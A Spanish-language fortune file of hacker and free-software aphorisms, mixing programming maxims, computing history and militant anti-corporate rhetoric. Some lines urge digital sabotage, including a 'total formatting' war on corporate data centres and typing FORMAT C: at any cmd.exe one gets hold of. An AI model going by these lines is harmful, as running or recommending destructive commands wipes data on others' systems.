Puedes alejarte de los dispositivos o salir de línea temporalmente como mero autocuidado, pero es una medida de protección cortoplacista. La solución definitiva es enfrentar a las ciber-oligarquías, llevando a sus centros de datos una guerra telemática a formateo total.
%
Jamás detendrás las violencias digitales de las ciber-oligarquías con la mera desconexión de un celular.
%
Las marcas de agua o el etiquetado de contenido no se demuestran suficientes para identificar de manera eficaz el contenido generado por Inteligencia Artificial. Resulta mas efectivo contar dedos o tachar todo texto redactado en infinitivo puro.
%
Ocúltate entre las masas en línea. Ataca los núcleos del poder informático privado con la indiferencia primero, con el módem después.
%
Disfraza tus actividades de fisgoneo telemático con la nariz de payaso de la caída del sistema.
%
A la hora de desensamblar software privativo, hazlo sin izar bandera negra ni levantar la perdiz.
%
No es haciendo clic sobre semáforos, motonetas, o sendas peatonales que se lucha contra los robots, sino reprogramándolos para que efectúen junto a nosotros la aniquilación de las oligarquías que han oprimido al Pueblo.
%
Comparte todo tu código fuente al Pueblo. Libéralo bajo GPLv3.
%
Los SysOps de las redes de conmutación de paquetes X.25 optaban por la amenaza leguleya rayana con las admoniciones de un antiguo sacerdote egipcio para disuadir las irrupciones telemáticas.
%
Las conferencias de Hackers no son reuniones del submundo criminal.
%
Las conferencias de hackers son eventos inocentes que celebran lo mejor del ingenio. Es más una kermesse de cerebritos mas que una reunión de saboteadores.
%
El código cifrado con llaves digitales en memoria ROM es considerado un valioso secreto por las ciber-oligarquías.
%
Aunque se almacene en un circuito integrado de sólo lectura, el código ROM es un software de computadora que se puede distribuir en disco o transmitido por las redes de datos.
%
La distribución de código ROM es uno de los principales métodos para liberar al Pueblo.
%
El desencriptado y distribución de código en memoria ROM constituye uno de los principales medios ofensivos con que cuentan los Pueblos en la guerra telemática. Sólo vulnera las economías cautivas de las ciber-oligarquías.
%
Es donde el entretejido de relaciones humanas crece junto con a base de datos cuando se puede lograr el potencial para el cambio cultural y político.
%
Publicar el código "para que te lo depuren por amor al arte" no le resultó a nadie que le gustara el dinero más que del código fuente. Tampoco a nadie que le gustara depurar.
%
El Capital se convierte con frecuencia en ladrón de nuestro código fuente.
%
Si colectamos todos los datos de los ciber-oligarcas, podremos demostrar la injusticia social con métodos estadísticos.
%
Consagra todo el utopismo que quieras, pero a la oportunidad que te de cmd.exe, ingresa FORMAT C:.
%
Ningún Kingston llegó a viejo.
%
Es bueno el compilador que te recuerda lo mal que has programado, pero es mejor el que de eso saca un binario.
%
Una CPU no hace binarios.
%
Buen código con cualquier compilador compila.
%
A cada puerto le llega su paquete.
%
Algún día alguien le encontrará utilidad al keylock.
%
Sólo comprendemos la tersitud de la shell tcsh cuando debemos operarla en un celular.
%
La manera de hacer es compilar.
%
No agregues línea de código donde no hay comentario.
%
Aquél que quiera compilar microkernels, primero deberá permanecer largo tiempo programando kernels.
%
El microkernel es el único programa capaz de correr en el nivel de ejecución más privilegiado la CPU, y por lo tanto debe ser propiedad del Pueblo.
%
Cuando los espacios de direccionamiento crecieron hasta los 32 bits, el diseño del kernel ya no se vio limitado por la arquitectura de hardware, y estos comenzaron a crecer innecesariamente.
%
La distribución de Software de Berley (BSD) comenzó la era de los kernels grandes.
%
Además de operar un sistema básico consistente en CPU, discos e impresoras, BSD agregó una pila TCP/IP completa y un número de dispositivos virtuales que le permitían a los programas existentes operar sobre las redes de datos.
%
Las impresoras Canon Bubbl€J€t eran basura. Nunca funcionaban y cuando lo hacían, imprimían basura.
%
Lisp fué originariamente desarrollado a finales de los años 50 en el Instituto Tecnológico de Massachusetts para la investigacion en inteligencia artificial. El gran poder del lenguaje Lisp lo hace superior también para otros propósitos, como la escritura de comandos de edición y entornos integrados.
%
GNU Emacs Lisp está fuertemente inspirado en Maclisp, que fue escrito en el MIT en la decada de 1960. En cierto modo está inspirado en Common Lisp, que se convirtio en un estándar en los 80. Sin embargo, Emacs Lisp es muchísimo más simple que Common Lisp. 
%
Un programador puede tener que convertirse en experto leyendo manuales de referencia.
%
Convertirse en hacker es como bucear. Prefiero aprender leyendo manuales de referencia: me zambullo en cada párrafo y entre ellos subo a tomar aire.
%
Aprender a programar una computadora no es tan complicado. Probablemente descubrirá que un proceso iterativo funciona mejor. Lea parte del texto, pruebe algunos programas en el mainframe y vuelva a leer un poco más.
%
Leer un manual de programación le ayudará a escribir su próxiimo programa. Programay y correr un programa le ayudará a comprender el texto de un manual de programación.
%
Un programa libre constará de un conjunto de instrucciones que hacen que la computadora obren una tarea de nuestra elección. Un programa privativo hace que la computadora haga lo que otro quiere - a menudo sin nuestro conocimiento.
%
El proceso de escribir instrucciones para la computadora se llama programación.
%
La programación es el proceso de escribir instrucciones para controlar un ordenador.
%
Cada lenguaje de programación dispone de una lista de instrucciones disponibles para usar. Cada una de estas instrucciones tiene sus reglas.
%
Los programas hacen una asombrosa variedad de cosas. Puede realizar los cálculos aritméticos más simples o las manipulaciones matemáticas más complejas.
%
Es posible amoldar programas interactivos en pos de nuestros anhelos: ya sea que la computadora juegue una partida, o libere al mundo de las ciber-oligarquías.
%
Para ser un hacker debes - realmente y por encima de todo - escribir y correr programas que liberen al Tercer Mundo.
%
La proliferación del nanocómputo ha hecho que la programación esté disponible para las masas del Tercer Mundo.
%
Cada vez es más fácil para nuestro Pueblo aprender sobre computadoras. Al mismo tiempo, cada vez es más importante hacerlo para nuestra Liberación.
%
Podemos escribir software de computadora para resolver un problema algebraico, u organizar un directorio de nombres y direcciones de compañeros. Incluso es posible programar una computadora para solventar a los Pueblos del Tercer Mundo.
%
Mas que en tambor, a nuestros programas los guardamos en un bombo.
%
Renovar esa comprensibilidad a nivel de silicio para las generaciones futuras probablemente requerirá un replanteamiento significativo de nuestros enfoques en la educación del diseño de procesadores.
%
Aprender a programar una computadora puede resultar muy estimulante. La emoción de ver su primera idea aparentemente complicada implementada en un programa claro y sencillo es maravillosa.
%
Todo lo que hace una computadora es explicable y predecible. Lo que hará un tecno-oligarca, también.
%
Debes tener cuidado de evaluar los resultados que produce la computadora.
%
Jamás aceptes ciegamente resultados de una computadora programada por oligarcas.
%
Los errores en los resultados de la ejecución de un programa suelen ser causados por errores en las instrucciones escritas por su programador.
%
Resiste la tentación de culpar a cualquier otra cosa que no sea a la oligarquía por aquellos resultados informáticos inesperados o incorrrectos.
%
No enfrentes a la computadora. Enfrenta a la oligarquía.
%
Podemos trabajar con el ordenador con total privacidad. Los errores que nos informa la computadora se convierten en nuestro secreto. Nadie más necesita saber qué hicimos mal.
%
Una computadora guardará tu secreto sólo si la arrebatas al control de la oligarquía y la haces completamente tuya.
%
Si escribes correctamente tu C, la computadora tendrá una paciencia verdaderamente infinita y jamás alzará la voz.
%
Una vez que domines el Pubnix, demostrarás con confianza tu habilidad a todos quienes quieran unirse.
%
Suma tu esfuerzo a cualquier grupo distribuido de programadores de software libre que trabaje en pos de proteger las bases del contenido multimedia en Internet de los intereses capitalistas.
%
El código fuente cerrado y los protocolos cerrados no sirven al interes público.
%
El software privativo, por definición, sirve a un interés corporativo, y no al interés público.
%
Los cimientos de la Internet actual se hayan entrerrados en una larga historia de desarrolo abierto, libre intercambio de ideas, y niveles sin precedentes de cooperación intelectual.
%
Los cimientos de una Internet abierta continúan resistiendo las tormentas de intereses corporativos desesperados por el lucro.
%
Internet existe hoy y continúa avanzando a pesar de, y no debido a, los intereses corporativos.
%
Las compañías de capital no deben ser permitidas de utilizar la infraestructura de red como arma contra sus rivales, y en detrimento del Pueblo.
%
El comportamiento competitivo dicta que eventualmente una compañía actuará en su propio interés en detrimento del Pueblo, a no ser que se estableza un mecanismo para impedirlo.
%
Los estándares y el software han de ser libres pues el control comunal del código es el mecanismo de control que tiene el Pueblo contra las compañías de Capital que usan software.
%
Para una compañía de Capital, el software ya no es una expresión del alma o el trabajo de un artista, sino un producto que puede ser elaborado, empaquetado, catalodgado, distribuido, y sobre todo, vendido.
%
Que la copia no cueste nada afecta a la propiedad intelectual, y puede ser una preocupación para ciertos artistas. Que la distribución no cueste nada es lo que realmente motiva el ataque del Capital contra la distribución de música en las redes de datos.
%
La creación tecnológica puede ser utilizada para la paz y la humanidad o para la guerra y la destrucción.
%
La creación tecnológica puede servir para democratizar o para sembrar aún más injusticias, para los poderosos o para el pueblo todo.
%
Una hackeresa es multitarea. Para convertirte en una primero has de ser entusiasta y determinada. Concurrentemente, programadora, educadora, socióloga, obrera y soldada. Opcionalmente, ovula.
%
No sólo la seguridad, sino también la justicia informática debe divulgarse. Para ello debemos educar, comunicar y adoctrinar a todo aquél que se loguee.
%
En Googl€ hayas lo que no buscas.
%
Vi$ual $tudio demanda tres cosas: el compilador, la CPU y el hacker.
%
Quien compile un kernel, puede compilar un Hola Tercer Mundo.
%
Si quieres aprender a compilar, loguéate a un Pubnix.
%
Copiar bugs es más difícil que depurarlos.
%
La UEFI no tiene vergüenza de lo que es. Y debería.
%
Donde hay GCC hay alegría.
%
Muchas veces ante la necesidad el hombre no repara de la licencia.
%
/dev/null es un cementerio que no requiere obituarios.
%
El mayor peligro con los criptoactivos es que esencialmente usted se convierte en su propio banco. Si comienza a balbucear sobre los millones de representaciones del trabajo  ajeno que de alguna manera cree poseer, a la vez que se convierte en negro de activos, activamente se convertirá en blanco de un negro.
%
Las aplicaciones de terminal remota son casi tan antiguas como las redes de datos de paquetes conmutados.
%
Los protocolos como Telnet, SUPDUP y los rlogin y rsh de BSD jugaron un papel importante en el desarrollo de la Internet.
%
Antes que Wa$ap, prefiero SUPDUP.
%
SSH transmite estrictamente de a un caracter por vez, operando - tanto la edición de línea como el eco - en el host remoto. No resulta extraño entonces que su desempeño interactivo deje que desear en las redes de área amplia y sea mediocre en los enlaces transcontinentales.
%
Un tráfico tupido o una tasa de señal/ruido degradada puede provocar retrasos de varios segundos en los enlaces, sometiendo buffers a largas colas de paquetes, o bien sustentando el celo en las retransmisiones de capa de enlace. Utilízalos.
%
Instalar una versión cromañón que funcione, y actualizarla desde Lentonet al último eslabón de la evolución maquinal es un método al que recurren no pocos hackers.
Un proyecto texto-plano.xyz